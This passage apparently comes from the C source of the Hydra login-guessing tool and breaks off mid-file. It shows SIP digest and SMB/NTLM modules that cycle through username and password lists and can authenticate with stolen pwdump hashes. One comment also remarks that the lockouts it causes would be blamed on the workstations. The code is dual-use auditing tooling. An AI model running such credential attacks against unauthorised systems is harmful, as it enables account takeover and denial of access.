\"sapr3\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n return 1;\n } else {\n if (strstr(error_info.key, \"ERROR_COMMUNICATION\") != NULL) {\n /* sysnr does not exist, report as port closed */\n return 3;\n }\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n }\n return 1;\n}\n\nvoid service_sapr3(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n next_run = start_sapr3(sock, ip, port, options, miscptr, fp);\n if (next_run == 1 && hydra_options.conwait)\n sleep(hydra_options.conwait);\n break;\n case 2:\n hydra_child_exit(0);\n case 3: /* clean exit */\n fprintf(stderr, \"[ERROR] could not connect to target port %d\\n\", port);\n hydra_child_exit(1);\n case 4:\n hydra_child_exit(2);\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\n#endif\n\nint32_t service_sapr3_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_sapr3(const char *service) { printf(\"Module sapr3 requires the client id, a number between 0 and 99\\n\\n\"); }\n" }, { "path": "hydra-sip.c", "content": "/* simple sip digest auth (md5) module 2009/02/19\n * written by gh0st 2005\n * modified by Jean-Baptiste Aviat - should\n * work now, but only with -T 1\n *\n * 05042011 david: modified to use sasl lib\n */\n\n#include \"hydra-mod.h\"\n\n#ifndef LIBOPENSSL\n#include \nvoid dummy_sip() { printf(\"\\n\"); }\n#else\n\n#include \"sasl.h\"\n#include \n\nextern int32_t hydra_data_ready_timed(int32_t socket, long sec, long usec);\n\nchar external_ip_addr[17] = \"\";\nchar *get_iface_ip(uint64_t ip);\nint32_t cseq;\nextern char *HYDRA_EXIT;\n\n#define SIP_MAX_BUF 1024\n\nvoid empty_register(char *buf, char *host, char *lhost, int32_t port, int32_t lport, char *user) {\n memset(buf, 0, SIP_MAX_BUF);\n snprintf(buf, SIP_MAX_BUF,\n \"REGISTER sip:%s SIP/2.0\\r\\n\"\n \"Via: SIP/2.0/UDP %s:%i\\r\\n\"\n \"From: \\r\\n\"\n \"To: \\r\\n\"\n \"Call-ID: 1337@%s\\r\\n\"\n \"CSeq: %i REGISTER\\r\\n\"\n \"Content-Length: 0\\r\\n\\r\\n\",\n host, lhost, lport, user, host, user, host, host, cseq);\n}\n\nint32_t get_sip_code(char *buf) {\n int32_t code;\n char tmpbuf[SIP_MAX_BUF], word[SIP_MAX_BUF];\n\n if (sscanf(buf, \"%256s %i %256s\", tmpbuf, &code, word) != 3)\n return -1;\n return code;\n}\n\nint32_t start_sip(int32_t s, char *ip, char *lip, int32_t port, int32_t lport, unsigned char options, char *miscptr, FILE *fp) {\n char *login, *pass, *host, buffer[SIP_MAX_BUF], *result = NULL;\n int32_t i;\n char buf[SIP_MAX_BUF];\n\n if (strlen(login = hydra_get_next_login()) == 0)\n return 3;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = NULL;\n\n if (external_ip_addr[0])\n lip = external_ip_addr;\n\n host = miscptr;\n cseq = 1;\n\n empty_register(buffer, host, lip, port, lport, login);\n cseq++;\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 3;\n }\n\n int32_t has_sip_cred = 0;\n int32_t try = 0;\n\n /* We have to check many times because server may begin to send \"100 Trying\"\n * before \"401 Unauthorized\" */\n while (try < 2 && !has_sip_cred) {\n try++;\n if (hydra_data_ready_timed(s, 3, 0) > 0) {\n i = hydra_recv(s, (char *)buf, sizeof(buf) - 1);\n if (i > 0)\n buf[i] = '\\0';\n if (strncmp(buf, \"SIP/2.0 404\", 11) == 0) {\n hydra_report(stdout, \"[ERROR] Get error code 404 : user '%s' not found\\n\", login);\n return 2;\n }\n if (strncmp(buf, \"SIP/2.0 606\", 11) == 0) {\n char *ptr = NULL;\n int32_t i = 0;\n\n // if we already tried to connect, exit\n if (external_ip_addr[0]) {\n hydra_report(stdout, \"[ERROR] Get error code 606 : session is not \"\n \"acceptable by the server\\n\");\n return 2;\n }\n\n if (verbose)\n hydra_report(stdout, \"[VERBOSE] Get error code 606 : session is not \"\n \"acceptable by the server,\\n\"\n \"maybe it's an addressing issue as you are \"\n \"using NAT, trying to reconnect\\n\"\n \"using addr from the server reply\\n\");\n /*\n SIP/2.0 606 Not Acceptable\n Via: SIP/2.0/UDP 192.168.0.21:46759;received=82.227.229.137\n */\n#ifdef HAVE_PCRE\n if (hydra_string_match(buf, \"Via: SIP.*received=\")) {\n ptr = strstr(buf, \"received=\");\n#else\n if ((ptr = strstr(buf, \"received=\"))) {\n#endif\n strncpy(external_ip_addr, ptr + strlen(\"received=\"), sizeof(external_ip_addr));\n external_ip_addr[sizeof(external_ip_addr) - 1] = '\\0';\n for (i = 0; i < strlen(external_ip_addr); i++) {\n if (external_ip_addr[i] <= 32) {\n external_ip_addr[i] = '\\0';\n }\n }\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Will reconnect using external IP address %s\\n\", external_ip_addr);\n return 1;\n }\n hydra_report(stderr, \"[ERROR] Could not find external IP address in server answer\\n\");\n return 2;\n }\n }\n }\n if (!strstr(buf, \"WWW-Authenticate: Digest\")) {\n hydra_report(stderr, \"[ERROR] no www-authenticate header found!\\n\");\n return -1;\n }\n if (debug)\n hydra_report(stderr, \"[INFO] S: %s\\n\", buf);\n char buffer2[512];\n\n result = sasl_digest_md5(buffer2, login, pass, strstr(buf, \"WWW-Authenticate: Digest\") + strlen(\"WWW-Authenticate: Digest\") + 1, host, \"sip\", NULL, 0, NULL);\n if (result == NULL)\n return 3;\n\n memset(buffer, 0, SIP_MAX_BUF);\n snprintf(buffer, SIP_MAX_BUF,\n \"REGISTER sip:%s SIP/2.0\\n\"\n \"Via: SIP/2.0/UDP %s:%i\\n\"\n \"From: \\n\"\n \"To: \\n\"\n \"Call-ID: 1337@%s\\n\"\n \"CSeq: %i REGISTER\\n\"\n \"Authorization: Digest %s\\n\"\n \"Content-Length: 0\\n\\n\",\n host, lip, lport, login, host, login, host, host, cseq, buffer2);\n\n cseq++;\n if (debug)\n hydra_report(stderr, \"[INFO] C: %s\\n\", buffer);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 3;\n }\n try = 0;\n int32_t has_resp = 0;\n int32_t sip_code = 0;\n\n while (try < 2 && !has_resp) {\n try++;\n if (hydra_data_ready_timed(s, 5, 0) > 0) {\n memset(buf, 0, sizeof(buf));\n if ((i = hydra_recv(s, (char *)buf, sizeof(buf) - 1)) >= 0)\n buf[i] = 0;\n if (debug)\n hydra_report(stderr, \"[INFO] S: %s\\n\", buf);\n sip_code = get_sip_code(buf);\n if (sip_code >= 200 && sip_code < 300) {\n hydra_report_found_host(port, ip, \"sip\", fp);\n hydra_completed_pair_found();\n has_resp = 1;\n }\n if (sip_code >= 400 && sip_code < 500) {\n has_resp = 1;\n }\n }\n }\n\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n return 1;\n}\n\nvoid service_sip(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_SIP, mysslport = PORT_SIP_SSL;\n\n char *lip = get_iface_ip((int32_t) * (&ip[1]));\n\n hydra_register_socket(sp);\n\n // FIXME IPV6\n if (ip[0] != 4) {\n fprintf(stderr, \"[ERROR] sip module is not ipv6 enabled yet, patches are \"\n \"appreciated.\\n\");\n hydra_child_exit(2);\n }\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n run = 3;\n\n int32_t lport = 0;\n\n while (1) {\n switch (run) {\n case 1:\n if (sock < 0) {\n if (port != 0)\n myport = port;\n lport = rand() % (65535 - 1024) + 1024;\n hydra_set_srcport(lport);\n\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_udp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n free(lip);\n hydra_child_exit(1);\n }\n }\n next_run = start_sip(sock, ip, lip, port, lport, options, miscptr, fp);\n break;\n case 2:\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n free(lip);\n hydra_child_exit(2);\n break;\n case 3:\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n free(lip);\n hydra_child_exit(2);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n free(lip);\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nchar *get_iface_ip(uint64_t ip) {\n int32_t sfd;\n\n sfd = socket(AF_INET, SOCK_DGRAM, 0);\n\n struct sockaddr_in tparamet;\n\n tparamet.sin_family = AF_INET;\n tparamet.sin_port = htons(2000);\n tparamet.sin_addr.s_addr = ip;\n\n if (connect(sfd, (const struct sockaddr *)&tparamet, sizeof(struct sockaddr_in))) {\n perror(\"connect\");\n close(sfd);\n return NULL;\n }\n struct sockaddr_in *local = malloc(sizeof(struct sockaddr_in));\n int32_t size = sizeof(struct sockaddr_in);\n\n if (getsockname(sfd, (void *)local, (socklen_t *)&size)) {\n perror(\"getsockname\");\n close(sfd);\n free(local);\n return NULL;\n }\n close(sfd);\n\n char buff[32];\n\n if (!inet_ntop(AF_INET, (void *)&local->sin_addr, buff, 32)) {\n perror(\"inet_ntop\");\n free(local);\n return NULL;\n }\n char *str = malloc(sizeof(char) * (strlen(buff) + 1));\n\n strcpy(str, buff);\n free(local);\n return str;\n}\n\n#endif\n\nint32_t service_sip_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-smb.c", "content": "#include \"hydra-mod.h\"\n#ifndef LIBOPENSSL\nvoid dummy_smb() { printf(\"\\n\"); }\n#else\n#include \"hmacmd5.h\"\n#include \"sasl.h\"\n#include \n#include \n\n// FIXME XXX BUG: several malloc()s without return code checking\n\n/*\n\nhttp://technet.microsoft.com/en-us/library/cc960646.aspx\n\n Most of the new code comes from Medusa smbnt module\n\n ------------------------------------------------------------------------\n Copyright (C) 2009 Joe Mondloch\n JoMo-Kun / jmk@foofus.net\n\n This program is free software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License version 2,\n as published by the Free Software Foundation\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n http://www.gnu.org/licenses/gpl.txt\n\n This program is released under the GPL with the additional exemption\n that compiling, linking, and/or using OpenSSL is allowed.\n\n ------------------------------------------------------------------------\n\n Based on code from: SMB Auditing Tool\n [Copyright (C) Patrik Karlsson 2001]\n This code allows Hydra to directly test NTLM hashes against\n a Windows. This may be useful for an auditor who has aquired\n a sam._ or pwdump file and would like to quickly determine\n which are valid entries. This module can also be used to test\n SMB passwords against devices that do not allow clear text\n LanMan passwords.\n\n The \"-m 'METHOD'\" option is required for this module. The\n following are valid methods: Local, Domain, Hash, Machine,\n NTLMV2, NTLM, LMV2, LM (in quotes).\n\n Local == Check local account.\n Domain == Check credentials against this hosts primary\n domain controller via this host.\n Hash == Use a NTLM hash rather than a password.\n Machine == Use the Machine's NetBIOS name as the password.\n NTLMV2, NTLM, LMV2, LM == set the dialect\n\n Be careful of mass domain account lockout with this. For\n example, assume you are checking several accounts against\n many domain workstations. If you are not using the 'L'\n options and these accounts do not exist locally on the\n workstations, each workstation will in turn check their\n respective domain controller. This could cause a bunch of\n lockouts. Of course, it'd look like the workstations, not\n you, were doing it. ;)\n\n **FYI, this code is unable to test accounts on default XP\n hosts which are not part of a domain and do not have normal\n file sharing enabled. Default XP does not allow shares and\n returns STATUS_LOGON_FAILED for both valid and invalid\n credentials. XP with simple sharing enabled returns SUCCESS\n for both valid and invalid credentials. If anyone knows a\n way to test in these configurations...\n\n*/\n\n#define WIN2000_NATIVEMODE 1\n#define WIN_NETBIOSMODE 2\n\n#define PLAINTEXT 10\n#define ENCRYPTED 11\n\n#ifndef CHAR_BIT\n#define CHAR_BIT 8\n#endif\n\n#ifndef TIME_T_MIN\n#define TIME_T_MIN ((time_t)0 < (time_t) - 1 ? (time_t)0 : ~(time_t)0 << (sizeof(time_t) * CHAR_BIT - 1))\n#endif\n#ifndef TIME_T_MAX\n#define TIME_T_MAX (~(time_t)0 - TIME_T_MIN)\n#endif\n\n#define IVAL_NC(buf, pos) (*(uint32_t *)((char *)(buf) + (pos))) /* Non const version of above. */\n#define SIVAL(buf, pos, val) IVAL_NC(buf, pos) = ((uint32_t)(val))\n\n#define TIME_FIXUP_CONSTANT_INT 11644473600LL\n\nextern char *HYDRA_EXIT;\nstatic unsigned char challenge[8];\nstatic unsigned char workgroup[16];\nstatic unsigned char domain[16];\nstatic unsigned char machine_name[16];\nint32_t hashFlag, accntFlag, protoFlag;\n\nint32_t smb_auth_mechanism = AUTH_NTLM;\nint32_t security_mode = ENCRYPTED;\n\nstatic size_t UTF8_UTF16LE(unsigned char *in, int32_t insize, unsigned char *out, int32_t outsize) {\n int32_t i = 0, j = 0;\n uint64_t ch;\n if (debug) {\n hydra_report(stderr, \"[DEBUG] UTF8_UTF16LE in:\\n\");\n hydra_dump_asciihex(in, insize);\n }\n for (i = 0; i < insize; i++) {\n if (in[i] < 128) { // one byte\n out[j] = in[i];\n out[j + 1] = 0;\n j = j + 2;\n } else if ((in[i] >= 0xc0) && (in[i] <= 0xdf)) { // Two bytes\n out[j + 1] = 0x07 & (in[i] >> 2);\n out[j] = (0xc0 & (in[i] << 6)) | (0x3f & in[i + 1]);\n j = j + 2;\n i = i + 1;\n } else if ((in[i] >= 0xe0) && (in[i] <= 0xef)) { // Three bytes\n out[j] = (0xc0 & (in[i + 1] << 6)) | (0x3f & in[i + 2]);\n out[j + 1] = (0xf0 & (in[i] << 4)) | (0x0f & (in[i + 1] >> 2));\n j = j + 2;\n i = i + 2;\n } else if ((in[i] >= 0xf0) && (in[i] <= 0xf7)) { // Four bytes\n ch = ((in[i] & 0x07) << 18) + ((0x3f & in[i + 1]) << 12) + ((0x3f & in[i + 2]) << 6) + (0x3f & in[i + 3]) - 0x10000;\n out[j] = (ch >> 10) & 0xff;\n out[j + 1] = 0xd8 | ((ch >> 18) & 0xff);\n out[j + 2] = ch & 0xff;\n out[j + 3] = 0xdc | ((ch >> 8) & 0x3);\n j = j + 4;\n i = i + 3;\n }\n if (j - 2 > outsize)\n break;\n }\n if (debug) {\n hydra_report(stderr, \"[DEBUG] UTF8_UTF16LE out:\\n\");\n hydra_dump_asciihex(out, j);\n }\n return j;\n}\n\nstatic unsigned char Get7Bits(unsigned char *input, int32_t startBit) {\n register uint32_t word;\n\n word = (unsigned)input[startBit / 8] << 8;\n word |= (unsigned)input[startBit / 8 + 1];\n\n word >>= 15 - (startBit % 8 + 7);\n\n return word & 0xFE;\n}\n\n/* Make the key */\nstatic void MakeKey(unsigned char *key, unsigned char *DES_key) {\n DES_key[0] = Get7Bits(key, 0);\n DES_key[1] = Get7Bits(key, 7);\n DES_key[2] = Get7Bits(key, 14);\n DES_key[3] = Get7Bits(key, 21);\n DES_key[4] = Get7Bits(key, 28);\n DES_key[5] = Get7Bits(key, 35);\n DES_key[6] = Get7Bits(key, 42);\n DES_key[7] = Get7Bits(key, 49);\n\n DES_set_odd_parity((DES_cblock *)DES_key);\n}\n\n/* Do the DesEncryption */\nvoid DesEncrypt(unsigned char *clear, unsigned char *key, unsigned char *cipher) {\n DES_cblock DES_key;\n DES_key_schedule key_schedule;\n\n MakeKey(key, DES_key);\n DES_set_key(&DES_key, &key_schedule);\n DES_ecb_encrypt((DES_cblock *)clear, (DES_cblock *)cipher, &key_schedule, 1);\n}\n\n/*\n HashLM\n Function: Create a LM hash from the challenge\n Variables:\n lmhash = the hash created from this function\n pass = users password\n challenge = the challenge recieved from the server\n*/\nint32_t HashLM(unsigned char **lmhash, unsigned char *pass, unsigned char *challenge) {\n static unsigned char magic[] = {0x4b, 0x47, 0x53, 0x21, 0x40, 0x23, 0x24, 0x25};\n unsigned char password[14 + 1];\n unsigned char lm_hash[21];\n unsigned char lm_response[24];\n int32_t i = 0, j = 0;\n unsigned char *p = NULL;\n char HexChar;\n int32_t HexValue;\n\n memset(password, 0, 14 + 1);\n memset(lm_hash, 0, 21);\n memset(lm_response, 0, 24);\n\n /* Use LM Hash instead of password */\n /* D42E35E1A1E4C22BD32E2170E4857C20:5E20780DD45857A68402938C7629D3B2::: */\n if (hashFlag == 1) {\n p = pass;\n while ((*p != '\\0') && (i < 1)) {\n if (*p == ':')\n i++;\n p++;\n }\n\n if (*p == '\\0') {\n hydra_report(stderr, \"[ERROR] Reading PwDump file.\\n\");\n return -1;\n } else if (*p == 'N') {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Found \\\"NO PASSWORD\\\" for LM Hash.\\n\");\n\n /* Generate 16-byte LM hash */\n DesEncrypt(magic, &password[0], &lm_hash[0]);\n DesEncrypt(magic, &password[7], &lm_hash[8]);\n } else {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Convert ASCII PwDump LM Hash (%s).\\n\", p);\n for (i = 0; i < 16; i++) {\n HexValue = 0x0;\n for (j = 0; j < 2; j++) {\n HexChar = (char)p[2 * i + j];\n\n if (HexChar > 0x39)\n HexChar = HexChar | 0x20; /* convert upper case to lower */\n\n if (!(((HexChar >= 0x30) && (HexChar <= 0x39)) || /* 0 - 9 */\n ((HexChar >= 0x61) && (HexChar <= 0x66)))) { /* a - f */\n\n hydra_report(stderr, \"[ERROR] Invalid char (%c) for hash.\\n\", HexChar);\n HexChar = 0x30;\n }\n\n HexChar -= 0x30;\n if (HexChar > 0x09) /* HexChar is \"a\" - \"f\" */\n HexChar -= 0x27;\n\n HexValue = (HexValue << 4) | (char)HexChar;\n }\n lm_hash[i] = (unsigned char)HexValue;\n }\n }\n } else {\n /* Password == Machine Name */\n if (hashFlag == 2) {\n for (i = 0; i < 16; i++) {\n if (machine_name[i] > 0x39)\n machine_name[i] = machine_name[i] | 0x20; /* convert upper case to lower */\n pass = machine_name;\n }\n }\n\n /* convert lower case characters to upper case */\n strncpy((char *)password, (char *)pass, 14);\n for (i = 0; i < 14; i++) {\n if ((password[i] >= 0x61) && (password[i] <= 0x7a)) /* a - z */\n password[i] -= 0x20;\n }\n\n /* Generate 16-byte LM hash */\n DesEncrypt(magic, &password[0], &lm_hash[0]);\n DesEncrypt(magic, &password[7], &lm_hash[8]);\n }\n\n /*\n NULL-pad 16-byte LM hash to 21-bytes\n Split resultant value into three 7-byte thirds\n DES-encrypt challenge using each third as a key\n Concatenate three 8-byte resulting values to form 24-byte LM response\n */\n DesEncrypt(challenge, &lm_hash[0], &lm_response[0]);\n DesEncrypt(challenge, &lm_hash[7], &lm_response[8]);\n DesEncrypt(challenge, &lm_hash[14], &lm_response[16]);\n\n memcpy(*lmhash, lm_response, 24);\n\n return 0;\n}\n\n/*\n MakeNTLM\n Function: Create a NTLM hash from the password\n*/\nint32_t MakeNTLM(unsigned char *ntlmhash, unsigned char *pass) {\n MD4_CTX md4Context;\n unsigned char hash[16]; /* MD4_SIGNATURE_SIZE = 16 */\n unsigned char unicodePassword[256 * 2]; /* MAX_NT_PASSWORD = 256 */\n int32_t i = 0, j = 0;\n int32_t mdlen;\n unsigned char *p = NULL;\n char HexChar;\n int32_t HexValue;\n\n /* Use NTLM Hash instead of password */\n if (hashFlag == 1) {\n /* 1000:D42E35E1A1E4C22BD32E2170E4857C20:5E20780DD45857A68402938C7629D3B2:::\n */\n p = pass;\n while ((*p != '\\0') && (i < 1)) {\n if (*p == ':')\n i++;\n p++;\n }\n\n if (*p == '\\0') {\n hydra_report(stderr, \"[ERROR] reading PWDUMP file.\\n\");\n return -1;\n }\n\n for (i = 0; i < 16; i++) {\n HexValue = 0x0;\n for (j = 0; j < 2; j++) {\n HexChar = (char)p[2 * i + j];\n\n if (HexChar > 0x39)\n HexChar = HexChar | 0x20; /* convert upper case to lower */\n\n if (!(((HexChar >= 0x30) && (HexChar <= 0x39)) || /* 0 - 9 */\n ((HexChar >= 0x61) && (HexChar <= 0x66)))) { /* a - f */\n /*\n * fprintf(stderr, \"Error invalid char (%c) for hash.\\n\", HexChar);\n * hydra_child_exit(0);\n */\n HexChar = 0x30;\n }\n\n HexChar -= 0x30;\n if (HexChar > 0x09) /* HexChar is \"a\" - \"f\" */\n HexChar -= 0x27;\n\n HexValue = (HexValue << 4) | (char)HexChar;\n }\n hash[i] = (unsigned char)HexValue;\n }\n } else {\n /* Password == Machine Name */\n if (hashFlag == 2) {\n for (i = 0; i < 16; i++) {\n if (machine_name[i] > 0x39)\n machine_name[i] = machine_name[i] | 0x20; /* convert upper case to lower */\n pass = machine_name;\n }\n }\n\n /* Initialize the Unicode version of the secret (== password). */\n /* This implicitly supports most UTF8 characters. */\n\n j = UTF8_UTF16LE(pass, strlen((char *)pass), unicodePassword, sizeof(unicodePassword));\n\n mdlen = j; /* length in bytes */\n\n MD4_Init(&md4Context);\n MD4_Update(&md4Context, unicodePassword, mdlen);\n MD4_Final(hash, &md4Context); /* Tell MD4 we're done */\n }\n\n memcpy(ntlmhash, hash, 16);\n return 0;\n}\n\n/*\n HashLMv2\n\n This function implements the LMv2 response algorithm. The LMv2 response is\n used to provide pass-through authentication compatibility with older servers.\n The response is based on the NTLM password hash and is exactly 24 bytes.\n\n The below code is based heavily on the following resources:\n\n http://davenport.sourceforge.net/ntlm.html#theLmv2Response\n samba-3.0.28a - libsmb/smbencrypt.c\n jcifs - packet capture of LMv2-only connection\n*/\nint32_t HashLMv2(unsigned char **LMv2hash, unsigned char *szLogin, unsigned char *szPassword) {\n unsigned char ntlm_hash[16];\n unsigned char lmv2_response[24];\n unsigned char unicodeUsername[20 * 2];\n unsigned char unicodeTarget[256 * 2];\n HMACMD5Context ctx;\n unsigned char kr_buf[16];\n int32_t ret, i;\n unsigned char client_challenge[8] = {0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88};\n\n memset(ntlm_hash, 0, 16);\n memset(lmv2_response, 0, 24);\n memset(kr_buf, 0, 16);\n\n /* --- HMAC #1 Caculations --- */\n\n /* Calculate and set NTLM password hash */\n ret = MakeNTLM((unsigned char *)&ntlm_hash, (unsigned char *)szPassword);\n if (ret == -1)\n return -1;\n\n /*\n The Unicode uppercase username is concatenated with the Unicode\n authentication target (the domain or server name specified in the Target\n Name field of the Type 3 message). Note that this calculation always uses\n the Unicode representation, even if OEM encoding has been negotiated; also\n note that the username is converted to uppercase, while the authentication\n target is case-sensitive and must match the case presented in the Target\n Name field.\n\n The HMAC-MD5 message authentication code algorithm (described in RFC 2104)\n is applied to this value using the 16-byte NTLM hash as the key. This\n results in a 16-byte value - the NTLMv2 hash.\n */\n\n /* Initialize the Unicode version of the username and target. */\n /* This implicitly supports 8-bit ISO8859/1 characters. */\n /* convert lower case characters to upper case */\n bzero(unicodeUsername, sizeof(unicodeUsername));\n for (i = 0; i < strlen((char *)szLogin); i++) {\n if ((szLogin[i] >= 0x61) && (szLogin[i] <= 0x7a)) /* a - z */\n unicodeUsername[i * 2] = (unsigned char)szLogin[i] - 0x20;\n else\n unicodeUsername[i * 2] = (unsigned char)szLogin[i];\n }\n\n bzero(unicodeTarget, sizeof(unicodeTarget));\n for (i = 0; i < strlen((char *)workgroup); i++)\n unicodeTarget[i * 2] = (unsigned char)workgroup[i];\n\n hmac_md5_init_limK_to_64(ntlm_hash, 16, &ctx);\n hmac_md5_update((const unsigned char *)unicodeUsername, 2 * strlen((char *)szLogin), &ctx);\n hmac_md5_update((const unsigned char *)unicodeTarget, 2 * strlen((char *)workgroup), &ctx);\n hmac_md5_final(kr_buf, &ctx);\n\n /* --- HMAC #2 Calculations --- */\n /*\n The challenge from the Type 2 message is concatenated with our fixed client\n nonce. The HMAC-MD5 message authentication code algorithm is applied to\n this value using the 16-byte NTLMv2 hash (calculated above) as the key.\n This results in a 16-byte output value.\n */\n\n hmac_md5_init_limK_to_64(kr_buf, 16, &ctx);\n hmac_md5_update((const unsigned char *)challenge, 8, &ctx);\n hmac_md5_update(client_challenge, 8, &ctx);\n hmac_md5_final(lmv2_response, &ctx);\n\n /* --- 24-byte LMv2 Response Complete --- */\n if ((*LMv2hash = malloc(24)) == NULL)\n return -1;\n memset(*LMv2hash, 0, 24);\n memcpy(*LMv2hash, lmv2_response, 16);\n memcpy(*LMv2hash + 16, client_challenge, 8);\n\n return 0;\n}\n\n/*\n HashNTLMv2\n\n This function implements the NTLMv2 response algorithm. Support for this\n algorithm was added with Microsoft Windows with NT 4.0 SP4. It should be noted\n that code doesn't currently work with Microsoft Vista. While NTLMv2\n authentication with Samba and Windows 2003 functions as expected, Vista\n systems respond with the oh-so-helpful \"INVALID_PARAMETER\" error code.\n LMv2-only authentication appears to work against Vista in cases where LM and\n NTLM are refused.\n\n The below code is based heavily on the following two resources:\n\n http://davenport.sourceforge.net/ntlm.html#theNtlmv2Response\n samba-3.0.28 - libsmb/smbencrypt.c\n\n NTLMv2 network authentication is required when attempting to authenticated to\n a system which has the following policy enforced:\n\n GPO: \"Network Security: LAN Manager authentication level\"\n Setting: \"Send NTLMv2 response only\\refuse LM & NTLM\"\n*/\nint32_t HashNTLMv2(unsigned char **NTLMv2hash, int32_t *iByteCount, unsigned char *szLogin, unsigned char *szPassword) {\n unsigned char ntlm_hash[16];\n unsigned char ntlmv2_response[56 + 20 * 2 + 256 * 2];\n unsigned char unicodeUsername[20 * 2];\n unsigned char unicodeTarget[256 * 2];\n HMACMD5Context ctx;\n unsigned char kr_buf[16];\n int32_t ret, i, iTargetLen;\n unsigned char client_challenge[8] = {0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88};\n\n /*\n -- Example NTLMv2 Response Data --\n\n [0] HMAC: (16 bytes)\n\n [16] Header: Blob Signature [01 01 00 00] (4 bytes)\n [20] Reserved: [00 00 00 00] (4 bytes)\n [24] Time: Little-endian, 64-bit signed value representing the number\n of tenths of a microsecond since January 1, 1601. (8 bytes) [32] Client\n Nonce: (8 bytes) [40] Unknown: 00 00 00 00 (4 bytes) [44] Target\n Information (from the Type 2 message) NetBIOS domain/workgroup: Type:\n domain 02 00 (2 bytes) Length: 12 00 (2 bytes) Name: WORKGROUP [NULL\n spacing -> 57 00 4f 00 ...] (18 bytes) End-of-list: 00 00 00 00 (4 bytes)\n Termination: 00 00 00 00 (4 bytes)\n */\n\n iTargetLen = 2 * strlen((char *)workgroup);\n\n memset(ntlm_hash, 0, 16);\n memset(ntlmv2_response, 0, 56 + 20 * 2 + 256 * 2);\n memset(kr_buf, 0, 16);\n\n /* --- HMAC #1 Caculations --- */\n\n /* Calculate and set NTLM password hash */\n ret = MakeNTLM((unsigned char *)&ntlm_hash, (unsigned char *)szPassword);\n if (ret == -1)\n return -1;\n\n /*\n The Unicode uppercase username is concatenated with the Unicode\n authentication target (the domain or server name specified in the Target\n Name field of the Type 3 message). Note that this calculation always uses\n the Unicode representation, even if OEM encoding has been negotiated; also\n note that the username is converted to uppercase, while the authentication\n target is case-sensitive and must match the case presented in the Target\n Name field.\n\n The HMAC-MD5 message authentication code algorithm (described in RFC 2104)\n is applied to this value using the 16-byte NTLM hash as the key. This\n results in a 16-byte value - the NTLMv2 hash.\n */\n\n /* Initialize the Unicode version of the username and target. */\n /* This implicitly supports 8-bit ISO8859/1 characters. */\n /* convert lower case characters to upper case */\n bzero(unicodeUsername, sizeof(unicodeUsername));\n for (i = 0; i < strlen((char *)szLogin); i++) {\n if ((szLogin[i] >= 0x61) && (szLogin[i] <= 0x7a)) /* a - z */\n unicodeUsername[i * 2] = (unsigned char)szLogin[i] - 0x20;\n else\n unicodeUsername[i * 2] = (unsigned char)szLogin[i];\n }\n\n bzero(unicodeTarget, sizeof(unicodeTarget));\n for (i = 0; i < strlen((char *)workgroup); i++)\n unicodeTarget[i * 2] = (unsigned char)workgroup[i];\n\n hmac_md5_init_limK_to_64(ntlm_hash, 16, &ctx);\n hmac_md5_update((const unsigned char *)unicodeUsername, 2 * strlen((char *)szLogin), &ctx);\n hmac_md5_update((const unsigned char *)unicodeTarget, 2 * strlen((char *)workgroup), &ctx);\n hmac_md5_final(kr_buf, &ctx);\n\n /* --- Blob Construction --- */\n\n memset(ntlmv2_response + 16, 1, 2); /* Blob Signature 0x01010000 */\n memset(ntlmv2_response + 18, 0, 2);\n memset(ntlmv2_response + 20, 0, 4); /* Reserved */\n\n /* Time -- Take a Unix time and convert to an NT 